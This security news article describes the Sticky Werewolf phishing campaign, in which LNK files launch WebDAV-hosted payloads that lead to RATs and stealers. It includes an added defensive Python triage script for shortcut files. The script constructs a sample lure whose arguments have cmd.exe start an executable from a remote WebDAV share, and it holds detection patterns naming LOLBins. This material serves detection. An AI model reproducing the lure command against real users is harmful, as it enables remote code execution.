Cybersecurity researchers have disclosed details of a threat actor known as Sticky Werewolf that has been linked to cyber attacks targeting entities in Russia and Belarus.
The phishing attacks have been aimed at a pharmaceutical company, a Russian research institute dealing with microbiology and vaccine development, and the aviation sector, expanding beyond the group's initial focus on government organizations, Morphisec said in a report last week.
“In previous campaigns, the infection chain began with phishing emails containing a link to download a malicious file from platforms like gofile.io,” security researcher Arnold Osipov said. “This latest campaign used archive files containing LNK files pointing to a payload stored on WebDAV servers.”
Sticky Werewolf, one of the many threat actors targeting Russia and Belarus, alongside Cloud Werewolf (aka Inception and Cloud Atlas), Quartz Wolf, Red Wolf (aka RedCurl), and Scaly Wolf, was first documented by BI.ZONE in October 2023. The group is believed to have been active since at least April 2023.
Earlier attacks documented by the cybersecurity firm leveraged phishing emails with links to malicious payloads that culminated in the deployment of the NetWire remote access trojan (RAT), whose infrastructure was taken down early last year following a law enforcement operation.
The new attack chain observed by Morphisec involves a RAR archive attachment that, when extracted, contains two LNK files and a decoy PDF document. The PDF claims to be an invitation to a video conference and urges recipients to click on the LNK files to get the meeting agenda and the email distribution list.
Opening either of the LNK files triggers the execution of a binary hosted on a WebDAV server, which leads to the launch of an obfuscated Windows batch script. The script, in turn, is designed to run an AutoIt script that ultimately injects the final payload, while at the same time bypassing security software and analysis attempts.
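The chain above starts with an LNK file whose target or arguments reach out to a WebDAV share, and that is the cheapest place to catch it: a shortcut that launches a command interpreter or points at a `\\host@80\DavWWWRoot\...` style path has no business arriving in an email archive. The following triage script is an added example written for this page, not Morphisec's tooling or anything recovered from the campaign. It parses the string fields of a shortcut according to the MS-SHLLINK layout (76-byte header, optional IDList, optional LinkInfo, then the Name, RelativePath, WorkingDir, Arguments and IconLocation strings) and flags WebDAV UNC paths and LOLBin launches. The sample shortcut it builds is constructed for the demonstration; the host `203.0.113.10`, the file names and the exact LNK fields are placeholders, since the article does not publish the campaign's own LNK contents.

```python
"""
Triage helper for Windows shortcut (.lnk) files: extract the StringData
fields and flag targets that reach a WebDAV share or launch a LOLBin.

Added example for this article; the shortcut built below is synthetic and
does NOT reproduce the Sticky Werewolf sample.
"""
import re
import struct

# LinkFlags bits from MS-SHLLINK
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData structures appear in exactly this order when their flag is set
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# CLSID 00021401-0000-0000-C000-000000000046, serialised little-endian
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# UNC forms the Windows WebClient (WebDAV) service resolves:
#   \\host@80\DavWWWRoot\...   \\host@SSL@443\...   \\host\DavWWWRoot\...
WEBDAV_RE = re.compile(r"\\\\[^\\\s]+(@SSL)?@\d{1,5}\\|\\\\[^\\\s]+\\DavWWWRoot\\", re.I)
UNC_RE = re.compile(r"\\\\[^\\\s]+\\\S+")
LOLBIN_RE = re.compile(
    r"\b(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)\.exe\b", re.I
)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus whichever StringData fields the shortcut carries."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"flags": flags}
    unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if unicode else 1
        raw = data[off : off + width * count]
        off += width * count
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return fields


def find_indicators(fields: dict) -> list:
    """Flag WebDAV/UNC targets and LOLBin launches in the parsed fields."""
    hits = []
    for name in ("relative_path", "working_dir", "arguments", "icon_location"):
        value = fields.get(name, "")
        if WEBDAV_RE.search(value):
            hits.append(f"{name}: WebDAV UNC path")
        elif UNC_RE.search(value):
            hits.append(f"{name}: UNC path")
        lolbin = LOLBIN_RE.search(value)
        if lolbin:
            hits.append(f"{name}: launches {lolbin.group(1).lower()}.exe")
    return hits


def build_sample_lnk(relative_path: str, arguments: str,
                     working_dir: str = "C:\\Windows\\System32") -> bytes:
    """Constructed shortcut: header + Unicode StringData only (no IDList/LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


if __name__ == "__main__":
    # Hypothetical lure shortcut: cmd.exe starting a binary from a WebDAV share
    blob = build_sample_lnk(
        "..\\..\\..\\Windows\\System32\\cmd.exe",
        "/c start \\\\203.0.113.10@80\\DavWWWRoot\\agenda\\meeting_agenda.exe")
    parsed = parse_lnk(blob)
    for hit in find_indicators(parsed):
        print(hit)
```

Run it over every `.lnk` pulled out of an inbound archive; a shortcut whose RelativePath resolves to a command interpreter, or whose arguments carry a `\\host@port\` or `DavWWWRoot` path, is worth quarantining before anyone double-clicks it. The parser deliberately skips the IDList, so a shortcut that encodes its WebDAV target only there will not be flagged by this version; extending it to walk the item IDs is the obvious next step.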
“This executable is an NSIS self-extracting archive which is part of a previously known crypter named CypherIT,” Osipov said. “While the original CypherIT crypter is no longer being sold, the current executable is a variant of it, as observed in a couple of hacking forums.”
The end goal of the campaign is to deliver commodity RATs and information stealer malware such as Rhadamanthys and Ozone RAT.
“While there is no definitive evidence pointing to a specific national origin for the Sticky Werewolf group, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists, but this attribution remains uncertain,” Osipov said.
The development comes as BI.ZONE revealed an activity cluster codenamed Sapphire Werewolf that has been attributed as behind more than 300 attacks on Russian education, manufacturing, IT, defense, and aerospace engineering sectors using Amethyst, an offshoot of the popular open-source SapphireStealer.
The Russian company, in March 2024, also uncovered clusters called Fluffy Wolf and Mysterious Werewolf that have used spear-phishing lures to distribute Remote Utilities, the XMRig miner, WarZone RAT, and a bespoke backdoor dubbed RingSpy.
“The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources,” it noted. “The backdoor’s [command-and-control] server is a Telegram bot.”